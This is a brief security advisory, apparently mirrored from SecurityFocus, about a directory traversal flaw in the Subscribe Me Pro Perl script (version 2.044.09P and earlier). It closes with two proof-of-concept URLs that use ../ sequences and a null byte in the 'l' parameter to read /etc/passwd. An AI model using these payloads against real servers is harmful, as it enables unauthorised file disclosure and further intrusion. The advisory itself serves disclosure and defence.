10 lines
No EOL
745 B
Text
10 lines
No EOL
745 B
Text
source: https://www.securityfocus.com/bid/14817/info
|
|
|
|
Subscribe Me Pro is prone to a directory traversal vulnerability. This is due to a lack of proper sanitization of user-supplied input.
|
|
|
|
Exploitation of this vulnerability could lead to a loss of confidentiality as arbitrary files are disclosed to an attacker. Information obtained through this attack may aid in further attacks against the underlying system.
|
|
|
|
Subscribe Me Pro 2.044.09P and prior are affected by this vulnerability.
|
|
|
|
http://www.example.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../../etc/passwd%00&SUBMIT=%20%20Submit%20%20
|
|
http://www.example.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscribe=subscribe&l=../../../../../../../../etc/passwd%00 |